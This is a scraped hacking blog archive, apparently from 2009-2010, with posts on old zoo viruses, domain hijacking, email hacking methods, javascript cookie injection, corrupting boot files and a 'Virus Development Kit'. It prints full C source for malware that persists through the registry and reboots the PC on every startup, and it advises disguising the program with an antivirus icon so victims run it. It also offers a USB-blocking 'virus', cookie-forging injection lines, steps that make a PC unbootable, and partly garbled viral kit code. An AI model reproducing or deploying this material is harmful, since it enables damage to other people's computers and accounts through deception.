Other viruses that are often referred to as zoo viruses are those left behind by technological advances. A classic example is Brain - widely regarded as the first PC virus. It only infected diskette boot sectors, and only those of 360 KB diskettes at that. These days, that probably seems a most unusual design decision, but given the computing milieu of the time, it made sense. The main (in fact, all but only) means of software or data exchange between PCs at the time was via diskette (see Sneakernet). With hard drives being very expensive and most software running on single floppy systems (and running well on dual-floppy systems), users were accustomed to booting from a system diskette, swapping the disk in the A: drive for a program disk and putting their data disks in the B: drive. Thus, booting from and swapping diskettes was common practice (in fact, booting from diskette was 'normal'). <br />
<br />
Return to topUnknownnoreply@blogger.com0tag:blogger.com,1999:blog-7251843823494886502.post-88067159211077666042010-01-08T02:59:00.000-08:002010-01-08T02:59:06.230-08:00Domain Hijacking<b>Domain Hijacking</b>–(How to Hijack a Domain ?)<br />
<br />
In this post I will tell you about how the domain names are hacked and how they can be protected. The act of hacking domain names is commonly known as Domain Hijacking. For most of you, the term “domain hijacking” may seem to be like an alien. So let me first tell you what domain hijacking is all about.<br />
Domain hijacking is a process by which Internet Domain Names are stolen from its legitimate owners. Domain hijacking is also known as domain theft. Before we can proceed to know how to hijack domain names, it is necessary to understand how the domain names operate and how they get associated with a particular web server (website).<br />
The operation of domain name is as follows<br />
Any website say for example gohacking.com consists of two parts. The domain name (gohacking.com) and the web hosting server where the files of the website are actually hosted. In reality, the domain name and the web hosting server (web server) are two different parts and hence they must be integrated before a website can operate successfully. The integration of domain name with the web hosting server is done as follows.<br />
1. After registering a new domain name, we get a control panel where in we can have a full control of the domain. <br />
2. From this domain control panel, we point our domain name to the web server where the website’s files are actually hosted.<br />
For a clear understanding let me take up a small example.<br />
John registers a new domain “abc.com” from an X domain registration company. He also purchases a hosting plan from Y hosting company. He uploads all of his files (.html, .php, JavaScript’s etc.) to his web server (at Y). From the domain control panel (of X) he configures his domain name “abc.com” to point to his web server (of Y). Now whenever an Internet user types “abc.com”, the domain name “abc.com” is resolved to the target web server and the web page is displayed. This is how a website actually works.<br />
What happens when a domain is hijacked?<br />
Now let’s see what happens when a domain name is hijacked. To hijack a domain name you just need to get access to the domain control panel and point the domain name to some other web server other than the original one. So to hijack a domain you need not gain access to the target web server.<br />
For example, a hacker gets access to the domain control panel of “abc.com”. From here the hacker re-configures the domain name to point it to some other web server (Z). Now whenever an Internet user tries to access “abc.com” he is taken to the hacker’s website (Z) and not to John’s original site (Y).<br />
In this case the John’s domain name (abc.com) is said to be hijacked.<br />
How the domain names are hijacked<br />
To hijack a domain name, it’s necessary to gain access to the domain control panel of the target domain. For this you need the following ingredients<br />
1. The domain registrar name for the target domain.<br />
2. The administrative email address associated with the target domain. <br />
This information can be obtained by accessing the WHOIS data of the target domain. To get access the WHOIS data, go to whois.domaintools.com, enter the target domain name and click on Lookup. Once the who is data is loaded, scroll down and you’ll see Who is Record. Under this you’ll get the “Administrative contact email address”.<br />
To get the domain registrar name, look for something like this under the Who is Record. “Registration Service Provided By: XYZ Company”. Here XYZ Company is the domain registrar. In case if you don’t find this, then scroll up and you’ll see ICANN Registrar under the “Registry Data”. In this case, the ICANN registrar is the actual domain registrar.<br />
The administrative email address associated with the domain is the backdoor to hijack the domain name. It is the key to unlock the domain control panel. So to take full control of the domain, the hacker will hack the administrative email associated with it. Email hacking has been discussed in my previous post how to hack an email account.<br />
Once the hacker take full control of this email account, he will visit the domain registrar’s website and click on forgot password in the login page. There he will be asked to enter either the domain name or the administrative email address to initiate the password reset process. Once this is done all the details to reset the password will be sent to the administrative email address. Since the hacker has the access to this email account he can easily reset the password of domain control panel. After resetting the password, he logs into the control panel with the new password and from there he can hijack the domain within minutes.<br />
How to protect the domain name from being hijacked<br />
The best way to protect the domain name is to protect the administrative email account associated with the domain. If you lose this email account, you loose your domain. So refer my previous post on how to protect your email account from being hacked. Another best way to protect your domain is to go for private domain registration. When you register a domain name using the private registration option, all your personal details such as your name, address, phone and administrative email address are hidden from the public. So when a hacker performs a WHOIS lookup for you domain name, he will not be able to find your name, phone and administrative email address. So the private registration provides an extra security and protects your privacy. Private domain registration costs a bit extra amount but is really worth for it’s advantages. Every domain registrar provides an option to go for private registration, so when you purchase a new domain make sure that you select the private registration option.Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7251843823494886502.post-3118278304821746722010-01-08T02:57:00.001-08:002010-01-08T02:57:54.067-08:00Common Email Hacking Methods<b>Common Email Hacking Methods</b><br />
<br />
Gone are the days when email hacking was a sophisticated art. Today anybody can access hacking tips through the Internet and start hacking your yahoo or hotmail account. All that is needed is doing a search on Google with keywords like “how to hack yahoo”, “hack yahoo messenger”, “hotmail hack program” etc. The following article is not an effort to teach you email hacking, but it has more to do with raising awareness on some common email hacking methods.<br />
Hackers can install key logger programs in the victim’s computer. This program can spy on what the user types from the keyboard. If you think that you can just uninstall such programs, you are wrong as they are completely hidden. After installation, the hacker will use a password and hot keys to enable the key logger. He can then use the hot keys and password to access your key entry details.<br />
A key logger program is widely available on the internet. Some of them are listed below<br />
Win-Spy Monitor<br />
Real time Spy<br />
Spy Agent Stealth<br />
Spy Anywhere<br />
For more information on key loggers and its usage refer my post Hacking an email account.<br />
Even if direct access to your computer is not possible, hackers can still install a key logger from a remote place and access your computer using Remote Administration Tools (RATs).<br />
Another way of getting your password is the use of fake login pages that look exactly like the real one. So, beware of the WebPages you visit. Also if you find your computer behaving oddly, there is a chance that some spy program is running. On such occasions it is better to try and remove the malware or reformat the entire hard disk. A detailed Email Hacking tutorial is discussed in the post Hacking an email account.Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7251843823494886502.post-37987244829363500522010-01-08T02:55:00.000-08:002010-01-08T02:55:27.144-08:00A Virus Program to Restart the Computer at Every Startup<b>A Virus Program to Restart the Computer at Every Startup</b><br />
<br />
<br />
Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.<br />
For this, the virus need to be double-clicked only once and from then onwards it will carry out rest of the operations. And one more thing, none of the antivirus software defect’s this as a virus since I have coded this virus in C. So if you are familiar with C language then it’s too easy to understand the logic behind the coding.<br />
Here is the source code.<br />
#include<stdio.h><br />
#include<dos.h><br />
#include<dir.h><br />
int found,drive_no;char buff[128];<br />
void findroot()<br />
{<br />
int done;<br />
struct ffblk ffblk; //File block structure<br />
done=findfirst(“C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive<br />
if(done==0)<br />
{<br />
done=findfirst(“C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not<br />
if(done==0)<br />
{<br />
found=1; //means that the system is already infected<br />
return;<br />
}<br />
drive_no=1;<br />
return;<br />
}<br />
done=findfirst(“D:\\windows\\system”,&ffblk,FA_DIREC);<br />
if(done==0)<br />
{<br />
done=findfirst(“D:\\windows\\system\\sysres.exe”,&ffblk,0);<br />
if<br />
(done==0)<br />
{<br />
found=1;return;<br />
}<br />
drive_no=2;<br />
return;<br />
}<br />
done=findfirst(“E:\\windows\\system”,&ffblk,FA_DIREC);<br />
if(done==0)<br />
{<br />
done=findfirst(“E:\\windows\\system\\sysres.exe”,&ffblk,0);<br />
if(done==0)<br />
{<br />
found=1;<br />
return;<br />
}<br />
drive_no=3;<br />
return;<br />
}<br />
done=findfirst(“F:\\windows\\system”,&ffblk,FA_DIREC);<br />
if(done==0)<br />
{<br />
done=findfirst(“F:\\windows\\system\\sysres.exe”,&ffblk,0);<br />
if(done==0)<br />
{<br />
found=1;<br />
return;<br />
}<br />
drive_no=4;<br />
return;<br />
}<br />
else<br />
exit(0);<br />
}<br />
void main()<br />
{<br />
FILE *self,*target;<br />
findroot();<br />
if(found==0) //if the system is not already infected<br />
{<br />
self=fopen(_argv[0],”rb”); //The virus file open’s itself<br />
switch(drive_no)<br />
{<br />
case 1:<br />
target=fopen(“C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place<br />
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\<br />
Current Version\\Run \/v sres \/t REG_SZ \/d<br />
C:\\windows\\system\\ sysres.exe”); //put this file to registry for startup<br />
break;<br />
Case 2:<br />
target=fopen(“D:\\windows\\system\\sysres.exe”,”wb”);<br />
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\<br />
Current Version\\Run \/v sres \/t REG_SZ \/d<br />
D:\\windows\\system\\sysres.exe”);<br />
break;<br />
Case 3:<br />
target=fopen(“E:\\windows\\system\\sysres.exe”,”wb”);<br />
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\<br />
Current Version\\Run \/v sres \/t REG_SZ \/d<br />
E:\\windows\\system\\sysres.exe”);<br />
break;<br />
Case 4:<br />
target=fopen(“F:\\windows\\system\\sysres.exe”,”wb”);<br />
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\<br />
Current Version\\Run \/v sres \/t REG_SZ \/d<br />
F:\\windows\\system\\sysres.exe”);<br />
break;<br />
Default:<br />
exit(0);<br />
}<br />
while(fread(buff,1,1,self)>0)<br />
fwrite(buff,1,1,target);<br />
fcloseall();<br />
}<br />
else<br />
system(“shutdown -r -t 0″); //if the system is already infected then just give a command to restart<br />
}<br />
NOTE: COMMENTS ARE GIVEN IN GREEN COLOUR.<br />
Compiling the Source Code into Executable Virus.<br />
<br />
1. Download the Source Code Here<br />
2. The downloaded file will be Sysres.C<br />
3. For step-by-step compilation guide, refer my post How to compile C Programs.<br />
Testing and Removing the Virus from Your PC<br />
<br />
you can compile and test this virus on your own PC without any fear. To test, just double-click the sysres.exe file and restart the system manually. Now onwards, when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.<br />
It will not do any harm apart from automatically restarting your system. After testing it, you can remove the virus by the following steps.<br />
1. Reboot your computer in the SAFE MODE<br />
2. Go to X:\Windows\System (X can be C, D, E or F) <br />
3.You will find a file by name sysres.exe, delete it.<br />
4. Type regedit in run. You will go to registry editor. Here navigate to<br />
HKEY_CURRENT_USER\Software\Microsoft\Windows\ Current Version\Run <br />
<br />
There, on the right site you will see an entry by name “sres“. Delete this entry. That’s it. You have removed this Virus successfully.<br />
Logic behind the Working of the Virus<br />
<br />
If I don’t explain the logic (Algorithm) behind the working of the virus, this post will be incomplete. So I’ll explain the logic in a simplified manner. Here I’ll not explain the technical details of the program. If you have further doubts please pass comments.<br />
LOGIC:<br />
1. First the virus will find the Root partition (Partition on which Windows is installed).<br />
2. Next it will determine whether the Virus file is already copied (Already infected) into X:\Windows\System<br />
3. If not it will just place a copy of itself into X:\Windows\System and makes a registry entry to put this virus file onto the startup.<br />
4. Or else if the virus is already found in the X:\Windows\System directory (folder), then it just gives a command to restart the computer.<br />
This process is repeated every time the PC is restarted.<br />
NOTE: The system will not be restarted as soon as you double click the Sysres.exe file. The restarting process will occur from the next boot of the system.<br />
AND ONE MORE THING BEFORE YOU LEAVE (This Step is optional)<br />
After you compile, the Sysres.exe file that you get will have a default icon. So if you send this file to your friends they may not click on it since it has a default ICON. So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive.<br />
For example you can change the .exe file’s icon into Norton antivirus ICON itself so that the people seeing this file believes that it is Norton antivirus. Or you can change its ICON into the ICON of any popular and trusted programs so that people will definitely click on it.<br />
The detailed tutorial on changing the ICON is given in my post How to Change the ICON of an EXE File .Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7251843823494886502.post-66920859221213435292010-01-08T02:53:00.000-08:002010-01-08T02:53:05.591-08:00A Virus Program to Disable USB Ports<b>A Virus Program to Disable USB Ports</b><br />
<br />
In this post I will show how to create a simple virus that disables/blocks the USB ports on the computer (PC). As usual I use my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.<br />
Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the you will not be able to use your pen drive or any other USB peripheral on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports.<br />
1. Download the USB_Block.rar file on to your computer.<br />
2. It contains the following 4 files.<br />
• block_usb.c (source code)<br />
• unblock_usb.c (source code)<br />
3. You need to compile them before you can run it. A step-by-step procedure to compile C programs is given in my post - How to Compile C Programs.<br />
3. upon compilation of block USB. You get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).<br />
4. To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe (you need to compile unblock_usb.c) file. Now insert the pen drive and it should get detected.<br />
5. You can also change the icon of this file to make it look like a legitimate program. For more details on this refer my post – How to Change the ICON of an EXE file (This step is also optional).<br />
1. How to Make a Trojan Horse<br />
2. How to Compile C Programs<br />
3. 12 Tips to Maintain a Virus Free Computer<br />
4. Hack Software and Run the Trial Program ForeverUnknownnoreply@blogger.com0tag:blogger.com,1999:blog-7251843823494886502.post-9591858790676907882010-01-08T02:50:00.000-08:002010-01-08T02:50:22.495-08:00<b>A Closer Look at Vulnerability in Gmail</b><br />
<br />
Gmail is one of the major webmail service Provider across the globe. But as we all know Gmail still carries that 4 letter word BETA. Sometimes we may wonder why Gmail is still in the testing stage even after years of its emergence. Here is one small reason for that. <br />
Gmail follows a strict rule that doesn’t allow it’s users to have their first or the last name contain the term Gmail or Google. That is, while signing up for a new Gmail account the users cannot choose a first or last name that contains the term Gmail or Google. You can see this from the below snapshot.<br />
<br />
This rule is implemented by Gmail for obvious reasons, because if the users are allowed to keep their first or the last name that contains the term Gmail or Google, then it is possible to easily impersonate the identity of Gmail (or Gmail Team) and engage themselves in phising or social engineering attacks on the innocent users. This can be done by simply choosing the first and last name with the following combinations.<br />
First Name Last Name<br />
Gmail Team<br />
Google Team<br />
Gmail Password Assistance <br />
From the above snapshot we can see that, Gmail has made a good move in stopping the users from abusing its services. However this move isn’t just enough to prevent the malicious users from impersonating the Gmail’s identity. Because Gmail has a small vulnerability that can be exploited so that the users can still have their name contain the terms Gmail or Google. You may wonder how to do this. But it’s very simple.<br />
1. Login to your Gmail account and click on Settings.<br />
2. Select Accounts tab<br />
3. Click on edit info<br />
4. In the Name field, select the second radio button and enter the name of your choice. Click on Save Changes and you’re done!<br />
Now, Gmail accepts any name even if it contains the term Google or Gmail. You can see from the below snapshot<br />
<br />
Allowing the users to have their names contain the terms Gmail or Google is a serious vulnerability even though it doesn’t seem to be a major one. This is because a hacker or a malicious attacker can easily exploit this flaw and send phishing emails to other Gmail users asking for sensitive information such as their passwords. Most of the users don’t even hesitate to send their passwords since they believe that they are sending it to Gmail Team (or someone authorized). But in reality they are sending it to an attacker who uses these information to seek personal benefits.<br />
So the bottom-line is, if you get any emails that appears to have come from the Gmail Team or similar, don’t trust them! Anyone can send such emails to fool you and take away your personal details. Hope that Gmail will fix this vulnerability as soon as possible to avoid any disasters.<br />
Visitors, who read this post, also read:<br />
1. Use Gmail Account to Send Emails from Multiple Addresses<br />
2. 12 Tips to Maintain a Virus Free Computer<br />
By using/following this site you agree to our Legal DisclaimerUnknownnoreply@blogger.com0tag:blogger.com,1999:blog-7251843823494886502.post-12111915938628852262010-01-08T02:49:00.000-08:002010-01-08T02:49:12.637-08:00<b>12 Tips to Maintain a Virus Free Computer</b><br />
<br />
Is your computer infected with virus? Do you often get mysterious error messages? Well this is a common problem faced by almost all the computer users across the globe. There are many viruses and worms out there that could infect your computer. Some are harmless, but, they do have the capacity to do any number of nasty things, up to and including, erasing all data from your computer. However there are ways to keep viruses away from your PC. Here are the 12 tips to maintain a virus free computer.<br />
1. Email is one of the common ways by which your computer can catch a virus. So it is always recommended to stay away from SPAM. Open only those emails that have its origin from a trusted source such as those which comes from your contact list. If you are using your own private email host (other than Gmail, yahoo, hotmail etc.) then it is highly recommended that you use good anti-spam software. And finally NEVER click on any links in the emails that comes from untrusted sources.<br />
2. USB thumb/pen drives is another common way by which viruses spread rapidly. So it is always a good habit to perform a virus scan before copying any data onto your computer. NEVER double-click the pen drive to open it. Instead right-click on it and select the option “open”. This is a safe way to open a pen drive. <br />
3. be careful about using MS Outlook. Outlook is more susceptible to worms than other e-mail programs, unless you have efficient Anti-Virus programs running. Use Pegasus or Thunderbird (by Mozilla), or a web-based program such as Hotmail or Yahoo (In Firefox).<br />
4. As we all know, Internet is the main source of all the malicious programs including viruses, worms, Trojans etc. In fact Internet contributes to virus infection by up to 80%. So here are the tips for safe surfing habits so that you can ward off virus infection up to the maximum extent.<br />
• Don’t click on pop-up windows that announce a sudden disaster in your city or announce that you’ve won an hourly prize. They are the ways to mislead Internet users and you should never trust them.<br />
• You can also use a pop-up blocker to automatically block those pop-ups.<br />
5. Most of us use search engines like Google to find what we are looking for. It is quite obvious for a malicious website to get listed in the search results. So to avoid visiting those untrusted malicious websites, you can download and install the AVG Link Scanner which is a freeware. This tool can become very handy and will help you to stay away from malicious websites.<br />
6. Install good antivirus software and keep it updated. Also perform full system scan periodically. It is highly recommended that you turn on the automatic update feature. This is the most essential task to protect your PC from virus. If PC security is your first option then it is recommended that you go for shareware antivirus software over the free ones. Most of the antivirus supports the Auto-Protect feature that provides real-time security for your PC. Make sure that this feature is turned on.<br />
7. Install a good Antispyware program that operates against Internet malware and spyware.<br />
8. Never open any email attachments that come from untrusted sources. If it is a picture, text or sound file (these attachments end in the extensions .txt, .jpeg, .gif, .bmp, .tif, .mp3, .htm, .html, and .avi), you are probably safe, but still do a scan before opening.<br />
9. Do not use disks that other people gave you, even from work. The disk could be infected with a virus. Of course, you can run a virus scan on it first to check it out.<br />
10. Set up your Windows Update to automatically download patches and upgrades. This will allow your computer to automatically download any updates to both the operating system and Internet Explorer. These updates fix security holes in both pieces of software.<br />
11. While you download files from untrusted websites/sources such as torrents, wares’ etc. make sure that you run a virus scan before executing them.<br />
12. And finally it is recommended not to visit the websites that feature illegal/unwanted stuffs such as cracks, serials, wares’ etc. since they contribute much in spreading of viruses and other malicious programs.Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7251843823494886502.post-51072931250649128362009-12-13T23:03:00.000-08:002009-12-13T23:03:01.005-08:00<b>Javascript Injection</b><br />
<br />
I found many people asking about XSS and so so..u can check the "XSS" topice discussed earlier form this link:<br />
http://www.orkut.co.in/Main#CommMsgs?cmm=25319870&tid=5399636797310526015 <br />
<br />
<b>The Javascript injection: A hidden power</b><br />
<br />
Javascript injection is a nifty little technique that allows you to alter a sites contents without actually leaving the site. This can be very usefull when say, you need to spoof the server by editing some form options. Examples will be explained throughout.<br />
<br />
Contents:<br />
<br />
I. Injection Basics<br />
<br />
II. Cookie Editing<br />
<br />
III. Form Editing <br />
<br />
<b>I. Injection Basics:-<i></i></b><br />
<br />
Javascript injections are run from the URL bar of the page you are visiting. To use them, you must first completly empty the URL from the URL bar. That means no http:// or whatever.<br />
<br />
Javascript is run from the URL bar by using the javascript: protocol. In this tutorial I will only teach you the bare bones of using this, but if you are a Javascript guru, you can expand on this using plain old javascript.<br />
<br />
The two commands covered in this tutorial are the alert(); and void(); commands. These are pretty much all you will need in most situations. For your first javascript, you will make a simple window appear, first go to any website and then type the following into your URL bar:<br />
<br />
code<br />
javascript:alert('Hello, World');<br />
<br />
You should get a little dialog box that says "Hello, World". This will be altered later to have more practical uses.<br />
You can also have more than one command run at the same time:<br />
code<br />
javascript:alert('Hello'); alert('World');<br />
This would pop up a box that said 'Hello' and than another that says 'World'. <br />
<br />
<b>II. Cookie Editing<i></i></b><br />
<br />
First off, check to see if the site you are visiting has set any cookies by using this script:<br />
<br />
code<br />
javascript:alert(document.cookie);<br />
<br />
<br />
This will pop up any information stored in the sites cookies. To edit any information, we make use of the void(); command.<br />
<br />
code<br />
javascript:void(document.cookie="Field = myValue");<br />
<br />
<br />
This command can either alter existing information or create entirely new values. Replace "Field" with either an existing field found using the alert(document.cookie); command, or insert your very own value. Then replace "myValue" with whatever you want the field to be. For example:<br />
<br />
code<br />
javascript:void(document.cookie="Authorized=yes");<br />
<br />
Would either make the field "authorized" or edit it to say "yes"... now wheter or not this does anything of value depends on the site you are injecting it on.<br />
<br />
It is also usefull to tack an alert(document.cookie); at the end of the same line to see what effect your altering had.Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7251843823494886502.post-31504015989532680752009-12-13T22:51:00.000-08:002009-12-13T22:51:08.797-08:00Booting CorruptionHow to corrupt booting files and solution:<br />
<br />
In our computer some files which known with booting files and with help of these files our computer hard disk boot these r always in c: drive and in case of xp 7 booting files<br />
1. boot.ini<br />
2. ntldr<br />
3. autoexec.bat<br />
4. io.sys<br />
5. msdos.sys<br />
6. config.sys<br />
7. ntdetect.com<br />
these all 7 files always hide in c: drive if u want to show file so go to start and run then<br />
1. cd \<br />
2. c:\>attrib -r -h -s -a ntldr<br />
3. go to c: drive and see there is ntldr file show <br />
4. right click it and open with notepad <br />
5. edit it some words and save<br />
6.now restart your computer after restart your computer will not run and a white dot will blink in top corner of monitior or LCD<br />
7. for solve this problem boot your computer with windows XP cd<br />
8. there will three options come <br />
a. Press enter to install windows xp<br />
b. to repair window press r for recovery console<br />
c. press f3 for quit<br />
9. choose second option "r"<br />
10. press 1 and enter <br />
11. there will same screen like cmd do there cd \<br />
12. c:\>dir <br />
13. c:\>del ntldr<br />
14. c:\>dir <br />
for see your ntldr delete or not<br />
15. c:\e:<br />
then select e: drive or d: drive or g: which your cd rom take see dir of all <br />
16.e:\>dir<br />
see there is windows xp cd files and i386 directory is also present there<br />
17.e\>cd i386<br />
18.e\i386>copy ntldr c:<br />
type exit and now your computer problem solve.<br />
<br />
Thanks...Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7251843823494886502.post-9095726859043441672009-12-13T22:05:00.000-08:002009-12-13T22:06:47.841-08:00Hacking.......with Worm'sOnce you locate where the utility is hidden, you could easily use it to perform both normal and reverse DNS lookups. as this is not a manual on using the "nslookup" command i will simply giving a basic relevant outline. in order to get a more detailed description of how this works or how to user it,<br />>nslookup IP Address<br />just go to run---- cmd -------- cd \------- cd windows<br />c:\windows>ping yahoo.com<br />Pinging yahoo.com {209.191.93.51} with 32 bytes of data:<br />Reply will come<br />then<br />c:\windows>nslookup 209.191.93.51<br />then comes....<br />Server: dnsblr.mantraonline.com<br />Address: 202.56.250.51<br />Name: address2.pim.vip.mud.yaho.com<br />Address: 209.191.93.51<br />Now, if u carefully look at the hostname that the reverse DNS lookup,gave use, then the last part reveals the country in which system resides in. you see, the '.in' parts signifies that the system is located in india. all countries have been allotted country codes, which more often than not are the part of the hostnames of the systems located in that country. this method can also be used to figure out as to which country a person lives in, if you know his email address . like mahesh983@yahoo.in<br />some common country codes are:<br />Australia .au<br />Indonesia .id<br />India .in<br />Japan .jp<br />Israel .il<br />Britain .uk<br />for a complete list of country codes, visit:<br />http://www.alldomains.com/<br />http://www.ianna.org/domain-names.html<br />Yet another and probably the second most eficient method (after reverse DNS queries) of tracing an IP to its exact geographical location, is to carry out a 'traceroute' on it. the 'tracert' or 'traceroute' commands give you names of IP's of the routers through shich it passses before reaching the destination. wndows users can perform a trace of an IP. by typing the following commands line on prompt:<br />c:\windows>tracert 209.191.93.51<br />Tracing route to 209.191.93.51 over a maximum of 30 hops<br />1 abc,netzero.com(232.61.41.251) 2 ms 1 ms 1 ms<br />2 xyz.netzero.com(209.191.23.0) 5 ms 5 ms 5 ms<br />3 232.61.41.10.(232.61.41.251) 9 ms 11 ms 13 ms<br />4 we21.spectranet.com (196.01.8312) 535 ms 549 ms 513 ms<br />5 isp.net.ny(196.23.0.25) 562 ms 596 ms 600 ms<br />6 196.23.0.25(196.23.0.25) 1195 ms 1204 ms<br />7 backbone.isp.ny(198.87.12.11) 1208 ms 1216 ms<br />8 asianet.com(202.12.32.10) 1210 ms 1239 ms 1211 ms<br />9 south.asinet.com(202.10.10.10) 1069 ms 1087 ms 1122ms <br />10 backbone.vsnl.net.in(203.98.46.01) 1064 ms 1109 ms 1061 ms<br />11 newdelhi-01.backbone.vsnl.net.in(203.102.46.01) 1185 ms 1146 ms 1203 ms<br />12 newdelhi-00.backbone.vsnl.net.in(203.102.46.02) 1159 ms 1073 ms<br />13 mtnl.net.in(203.194.56.00)1052 ms 642 ms 658 ms<br />the above shows route taken by data to reach the supplied IP is somewhat like this<br />Netzero-ISP from which the data is sent<br />Spectranet - A Backbone Provider<br />New Youk ISP -- >New York Backbone -->Asia ->South Asia -> India Backbone -> New Delhi Backbone ->Another router in New Delhi Backbone -> New Delhi ISP.<br />So basically this tracert does reveal my real location, which is : New Delhi, India, South Asia. Get it???<br />with the help of nslookup u can get location of an IP. jst as DNS lookup converts the hostname into IP address a reverse DNS lookup converts the ip address of aa host to hostname. by hostname what i mean to say is that it given us the name of the remote system in alphabets and numbers and periods,<br />DNS:-- domain name server :---- this server convert ip into domain name like yahoo or google has also an IP address and if u want to lookup of DNS so you can find with nslookup command<br />just go in start ---> run --> cmd<br />c:\Documents and Settings\Dohroo>nslookup google.com<br />see what message comes<br />Server: dnsblr.mantraonline.com<br />Address: 202.56.250.5<br />Non-authoritative answer:<br />Name: google.com<br />Address: 74.125.53.100, 74.125.67.100, 74.125.45.100<br />now ok ?<br />try it then u will understand i mean it will show u DNS and real addresses of google tooUnknownnoreply@blogger.com0tag:blogger.com,1999:blog-7251843823494886502.post-58490604100189331442009-12-13T21:54:00.000-08:002009-12-13T22:05:27.483-08:00The Ethical Hacking.......IT Security<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_RFpvEt16Suw/SyXVKaea8zI/AAAAAAAAAOU/RiC7h2LpUU0/s1600-h/home1.jpg"><img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 400px; height: 231px;" src="http://3.bp.blogspot.com/_RFpvEt16Suw/SyXVKaea8zI/AAAAAAAAAOU/RiC7h2LpUU0/s400/home1.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5414968501865214770" /></a>
<br /><h3 class="smller">Virus Development Kit (VDK 1.0) ..."vinnu"</h3> <div class="para">Virus Development Kit (VDK 1.0)
<br />
<br />After development of a viral library under topic
<br />
<br />"Malware 2.0 - The evolution"
<br />
<br />Now we are ready to use all those viral api functions.
<br />
<br />Note: Now i assume that u have pasted all the refined code in newlines otherwise seperated by ";" in "api.js" file in same viralkit folder.</div><div class="para">The VDK framework will be a simple HTML/javascript application developed by me and now being released for this community.
<br />
<br />It was used to develop the "Ashi" virus that infected successfully and u can still find it in google traces.
<br />
<br /></div><div class="para">SDK used: Opera, Notepad/Notepad++;</div><div class="para">In "viralkit" folder (folder containing api.js" file) create another file named
<br />
<br />"vdk.htm"
<br />
<br />And type in following code:
<br />
<br />
<br />
<br /><script src="api.js"></script>
<br /><script language="javascript"><br />var a="javascript:var vin=document.getElementsByTagName(\"form<wbr>\")[0];var nunnu;for(var iter=0;iter<vin.length;iter++){if(iter==<wbr>0){nunnu=vin.item(iter).name+\"=\"+vin.i<wbr>tem(iter).value;}else{nunnu+=\"&\"+vin.i<wbr>tem(iter).name+\"=\"+vin.item(iter).valu<wbr>e;}}alert(nunnu);";<br />var b="javascript:var x=\"\",vin=document.getElementsByTagName<wbr>(\"a\");for(var i=0;i<vin.length;i++){x+=vin[ c="document.getElementById(" num="=" value="a}else" num="=" value="b}" w="[">p","getRandChar","rotator","transformer"<wbr>,"varMaker","unique","toMorph","toMSourc<wbr>e","scraptor","scrambler","dict","refine<wbr>"];<br />var y=document.getElementById("api"),v=y.sel<wbr>ectedIndex;<br />var z=document.getElementById("funcname");if<wbr>(v<0)return; x="z.value;if(x.indexOf(w[v])">=0)return;i<wbr>f(x.length>0)x+=" ";x+=w[v];z.value=x;<br />}<br />function gener() {<br />var w="Object.prototype.";<br />var z=document.getElementById("funcname");<br />var robj=RegExp(" ","g");var y=z.value.split(robj,z.value.length);<br />var x="";for(var iter=0;iter<y.length;iter++){x+=w+y[iter<wbr>]+"="+eval(y[iter])+";"}<br />var u=document.getElementById("pan");var v=document.getElementById("vircode");v.v<wbr>alue=x+u.value;}<br /><br />function transf() {<br />var z=document.getElementById("vircode");<br />z.value=z.value.transformer();<br />}<br /></script>
<br /></div><div class="para"></div><div class="para">
<br /><span style="font-family:courier;">
<br /><h3>Jaijeya</h3>
<br /><div align="center"><span style="color:teal;">
<br /><h5>Ashi Virus Development Kit(VDK) 1.0</h5>
<br /></span></div>
<br /><hr color="teal" noshade="noshade">
<br /><div align="left">
<br />
<br />
<br />
<br /><table border="0" bgcolor="teal"><tbody><tr><td>
<br /><p>
<br />Probes
<br /></p></td><td>
<br /><p>Probes can be used to extract the required contents</p>
<br /></td></tr><tr><td>
<br /><select id="probes" size="2" multiple="multiple"><option selected="" onclick="probe(0)" title="Extracts the Form attributes and elements.">Form Analyzer</option><option onclick="probe(1)" title="Extracts the HREF's of all anchors.">HyperLink Analyzer</option></select>
<br /></td><td><textarea id="prbtext" cols="100" rows="2" title="Copy Probe code and paste in address bar of target webapp.">Select any probe.</textarea>
<br /></td></tr><tr><td colspan="2">
<br />
<br />
<br /><table border="0" bg style="color:gold;"><tbody><tr><td width="135"><span style="color:navy;">Write viral code in this textbox</span></td><td>
<br /><textarea id="pan" rows="10" cols="100" title="Write custom viral code here."></textarea>
<br />
<br /></td></tr></tbody></table>
<br /></td></tr></tbody></table>
<br /></div><div class="para"></div></span></div><span style="font-family:courier;"></span><div class="para"><span style="font-family:courier;">
<br />
<br />
<br /><table bgcolor="lavender" border="0"><tbody><tr><td rowspan="2">
